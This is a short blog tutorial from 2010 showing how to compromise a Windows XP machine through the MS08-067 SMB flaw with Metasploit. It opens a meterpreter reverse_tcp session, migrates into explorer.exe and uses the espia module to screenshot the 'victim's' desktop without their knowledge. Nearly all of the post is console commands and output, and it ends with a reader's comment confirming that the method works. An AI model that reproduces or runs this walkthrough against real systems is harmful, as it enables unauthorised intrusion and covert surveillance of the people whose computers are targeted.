Taking Screenshots Of The Victim’s Computer With Metasploit

January 30, 2010 – 3:51 PM

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module.  Start with a basic exploit to gain a meterpreter session.  You’ll need to make sure you migrate to a process that has access to Active Desktop or else you will get nothing but blank images:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost
rhost =>
msf exploit(ms08_067_netapi) > set lhost
lhost =>
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter > ps

Process list

PID   Name   Arch   User   Path
—   —-   —-   —-   —-
0   [System Process]
4   System   x86   NT AUTHORITY\SYSTEM
384   smss.exe   x86   NT AUTHORITY\SYSTEM   \SystemRoot\System32\smss.exe
524   csrss.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\services.exe
704   lsass.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\svchost.exe
972   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1064   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\System32\svchost.exe
1124   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1192   svchost.exe   x86   NT AUTHORITY\LOCAL SERVICE   C:\WINDOWS\system32\svchost.exe
1452   spoolsv.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe   x86   VM-WINXP\Troy   C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\ctfmon.exe
656   alg.exe   x86 NT   AUTHORITY\LOCAL SERVICE   C:\WINDOWS\System32\alg.exe
1252   wscntfy.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\wscntfy.exe
1940   firefox.exe   x86   VM-WINXP\Troy   C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >

Now we load the espia module and view the victim’s live desktop:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically and display on your screen:

That’s it.  You are now viewing the victim’s desktop without them even knowing you are there.

  1. One Response to “Taking Screenshots Of The Victim’s Computer With Metasploit”

  2. Excellent!! You rock !! I tried it and works perfectly.

    By Yom on Jun 1, 2011

You must be logged in to post a comment.